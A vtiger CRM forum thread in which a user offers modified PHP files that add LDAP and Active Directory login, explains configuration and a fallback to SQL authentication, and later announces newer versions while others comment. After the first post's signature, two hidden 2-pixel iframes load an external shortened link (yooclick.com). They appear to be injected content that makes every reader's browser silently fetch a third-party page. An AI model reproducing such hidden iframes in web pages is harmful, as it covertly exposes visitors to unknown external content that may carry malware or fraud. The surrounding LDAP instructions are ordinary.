vtiger LDAP + Active Directory Support Files (Download)

Hello

Already for version 4.2 djabbour has provided files to add LDAP support to vtiger.

I ABSOLUTELY don't understand why these modifications have not been included into newer versions.
Only the file Users.php contains the changes from djabbour.
But the additionally required modifications are NOT included in vtiger 5.04.
It is an enigma for me why a part has been added and the rest is missing!

I spent an entire day to implement LDAP support.
There are some explanations here in the forum how to imeplement LDAP / Active Directory support for version 5.04 but find all these explanations awkward.

I offer a download here which is an easy setup for you:

It contains not only the modified and added PHP files within their directory structure,
but also the origional files so you can immediately see and study what has changed even if you don't have version 5.04 installed!
Additionally my ZIP file contains a free Java LDAP Browser.

Usage:
First you must create accounts for all users which should work with vtiger which also exist with the same name on the LDAP server. (for example a Windows 2003 Domain Controler)
The accounts MUST first be created in vtiger!
It is not enough that the users exist on the LDAP server!!
If the user "John Mayer" has the account "jmayer" in LDAP (in your domain) the user "jmayer" msut be created manually in vtiger.
Don't forget to create at least one vtiger account with administrator permissions which also exists in LDAP!

1.)
The LDAP server is used to check the password when a user loggs in into vtiger.

2.)
Additionally in the user's deatail view the button "Change Password" is replaced with a fix text "LDAP authentication" or "Active Directory authentication" because the user cannot change his password in vtiger.

3.)
In the Login page you additionally see the current login Type (SQL, LDAP, AD) behind the password field.

The file config.inc.php must be adapted to your needs.

If you have any problems to login after making the changes:
Don't worry: Just modify
$AUTHCFG = 'LDAP';
into
$AUTHCFG = 'SQL';
in the file config.inc.php and all behaves as before!

Elmue <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

  • 12 Comments sorted by Votes Date Added
  • attention:
    you see the download zip file only if you are loged in !
  • elmue, i would suggest that you open a new topic at the vtiger forge so that your valuable contribution does not get lost in this forum and your work is appreciated.
  • elmue,

    balduin has a perfect example, and you could also add this into the feature requests forum as a place to post any updates that may ever be added.

    i would also look into creating patch files for patching an installation. this way if someone has already made modifications to the files you have included, they aren't forced to revert to a version you have supplied, and/or back to the original which may not be their original. the only other way to do it would be to compare the original files with your modified files, and this could take some time.

    thanks,
    jarvis
  • hello

    i worked on the code and released version 2.0.
    features:

    1.)
    the ldap server is only used to check the password when a user loggs in into vtiger.

    attention:
    there is no replication from accounts to vtiger!
    the user accounts must still be created in vtiger.
    the vtiger user name must be equal to the samaccountname on the ldap server!
    if the user "john mayer" logs in to your windows 2003 domain controler with the account "jmayer",
    then the user "jmayer" must be created manually in vtiger otherwise john mayer cannot log into vtiger.

    the only exception is the vtiger "admin" account.
    this still uses the mysql server to authenticate the password.
    so if there is something wrong with your ldap setup the admin can always login.

    for each ldap user you must specify if he is an ordinary user or administrator in vtiger!

    2.)
    additionally in the user's detail view the button "change password" is replaced
    with a fix text "ldap authentication" or "active directory authentication"
    because the user cannot change his password in vtiger.
    all ldap users must change their password on the domain controler.

    only the password for the local "admin" account can be changed in vtiger.


    the file config.inc.php must be adapted according to your ldap configuration.
    __________________________


    i hate these *.patch files.
    they are ugly and impossible to understand.

    i prefer to have the entire php file in origional and modified version.
    exactly this offers my zip file.
    with a program like totalcommander you can directly compare the two versions (sync directories) and see the differences.

    __________________________

    ok i will have a look into forge.

    for all those who dont have an account there i offer my latest version here.

    you must be logged in to see the zip file!

    elmü
  • thnx works very well!
  • how about version 5.1.0, using the same source didnot give nice result, fatal error: call to a member function getrowassoc() on a non-object fullpath/include/database/peardatabase.php on line 667

    got that error.
  • to be precice, your script works okey, the auth part atleast, but somehow it fails to enter to vtiger itself, i couldnot figure out what could have changed from the svn changelong aswell.
  • okey my bad, didnot have accounts in mysql, so someone could aswell delete these two last posts.
  • hello

    ########################################

    this thread is outdated!

    please do not post to this thread anymore!

    ########################################

    i created a new thread
    <!-- m --><a class="postlink" href="http://forums.vtiger.com/viewtopic.php?p=73028">http://forums.vtiger.com/viewtopic.php?p=73028</a><!-- m -->
    where you can download version 3.0 of my ldap patch which has a new interesting feature!

    elmü
Sign In or Register to comment.